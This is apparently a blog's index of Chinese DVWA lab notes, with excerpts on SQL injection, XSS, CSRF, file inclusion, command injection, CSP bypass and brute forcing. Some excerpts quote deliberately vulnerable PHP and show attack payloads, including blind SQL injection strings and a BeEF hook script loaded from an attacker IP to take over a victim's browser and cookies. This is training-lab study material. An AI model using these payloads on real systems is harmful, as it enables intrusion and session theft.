DVWA靶场-实验笔记
文章平均质量分 65
DVWA靶场漏洞,实验过程记录
Alsn86
这个作者很懒,什么都没留下…
展开
-
burpsuite的四种爆破模式
burpsuite的四种爆破模式准备字典1.txt和a.txt准备字典a.txtsniper模式对两个变量只可以设置一个字典逐一爆破两个变量,爆破一个,另一个值就是原始的那个不变Battering ram模式对两个变量只可以设置一个字典一炮双响Pitchfork模式两个变量可以选两个字典一一映射两个字典列数不一样时,就以短的字典长度为准,把1.txt长度增加为8,a.txt长度依旧为6爆破时,只对前6组进行匹配(以长度短的字典为准)Cluster b原创 2021-11-01 13:48:48 · 5270 阅读 · 0 评论 -
dvwa之CSRF
dvwa之CSRF是一个修改密码的功能把密码修改为111111的请求数据包是这样的,请求链接为http://192.168.1.110/dvwa-master/vulnerabilities/csrf/?password_new=111111&password_conf=111111&Change=ChangeCSRF之low等级<?phpif( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_G原创 2021-02-05 10:48:37 · 395 阅读 · 0 评论 -
dvwa之File Inclusion
dvwa之File Inclusion进行包含的文件名由get方法的page参数传递看一下包含的流程吧index.php<?phpdefine( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );require_once DVWA_WEB_PAGE_TO_ROOT . 'dvwa/includes/dvwaPage.inc.php';dvwaPageStartup( array( 'authenticated', 'phpids' ) );$page =原创 2021-02-04 12:34:40 · 774 阅读 · 0 评论 -
dvwa之Weak Session IDs
dvwa之Weak Session IDsweak Session IDs之low等级<?php$html = "";if ($_SERVER['REQUEST_METHOD'] == "POST") { if (!isset ($_SESSION['last_session_id'])) { $_SESSION['last_session_id'] = 0; } $_SESSION['last_session_id']++; $cookie_value = $_SESSION原创 2021-02-04 10:45:24 · 202 阅读 · 0 评论 -
dvwa之sql injection(blind)
dvwa之 sql injection(blind)sql injection(blind)之low等级1.判断出是字符型2.看当前数据库名字长度1’ and length(database())=4;# 显示正确 所以数据库名长度为43.判断数据库名字为dvwa1’ and substr(database(),1,1)=‘d’;# 判断出数据库名字第一个字符为’d’1’ and substr(database(),2,1)=‘d’;# 判断出数据库名字第一个字符为’v’1’ and原创 2021-01-27 16:51:33 · 888 阅读 · 1 评论 -
dvwa之 csp Bypass
dvwa之 csp Bypasscsp 是content security policy 内容安全策略,指定了可以运行哪些地方的js代码csp Bypass之low直接<script>alert(123)</script>弹不了的,因为响应里指定了允许运行js的来源,方法是去指定的网站写js代码 然后 复制链接过来csp Bypass之medium<script nonce=TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=>alert原创 2021-01-27 15:27:29 · 496 阅读 · 0 评论 -
dvwa之javascript
dvwa之javascript游戏规则是 成功提交success就算成功,而是否能成功提交取决于 token是否满足后端的验证看一下源码吧<?phpdefine( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );require_once DVWA_WEB_PAGE_TO_ROOT . 'dvwa/includes/dvwaPage.inc.php';dvwaPageStartup( array( 'authenticated', 'phpids' ) );$原创 2021-01-26 18:22:41 · 663 阅读 · 0 评论 -
dvwa之File Upload
dvwa之File UploadFile Upload之low等级没有任何防护<?phpif( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); //原创 2021-01-19 18:58:03 · 264 阅读 · 0 评论 -
dvwa之sql injection
dvwa之sql injectionlow,php,没有任何过滤,把sql搜索到的所有记录都输出来<?phpif( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $html .=$query;//自原创 2021-01-18 22:39:19 · 284 阅读 · 0 评论 -
在dvwa的xss中使用beef
在dvwa的xss中使用beefkali ip为192.168.253.8,在kali里启动beef在自动跳转出的登录页面登录beef,用户名密码都是beef在受害机,192.168.253.8,进行xss,其中<script src=http://192.168.253.132:3000/hook.js>,点击提交好了,beef里可以看见192.168.253.8上线了,获取了cookie,上线后就出现很多可以利用的模块了,我们试试重定向发现192.168.253.8原创 2021-01-18 11:27:42 · 680 阅读 · 0 评论 -
dvwa之XSS
dvwa之XSS反射新xss,low等级low.php<?phpheader ("X-XSS-Protection: 0");// Is there any input?if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user $html .= '<pre>Hello ' . $_GET[ 'name' ] . '</p原创 2021-01-16 11:32:11 · 201 阅读 · 0 评论 -
dvwa之Command Injection
dvwa之Command Injectioncmd中的逻辑运算符&&运算符命令1 && 命令2 只有命令1正确执行才执行命令2,因为如果命令1为假(命令语法不对),那么也就知道&&的结果是假了没必要再执行命令2||运算符命令1 || 命令2 只有命令1执行失败 才 执行命令2,因为如果命令1为真(语法正确),就知道||的结果为真了,没必要在执行命令2|运算符“|”是管道符,表示将Command 1的输出作为Command 2的输入,并原创 2021-01-15 21:31:09 · 241 阅读 · 0 评论 -
dvwa之Brute Force
low等级<?phpif( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5( $pass ); // Check the database $query = "SELECT * FROM `users` WHERE user = '$user' AND passw原创 2021-01-13 12:39:30 · 347 阅读 · 0 评论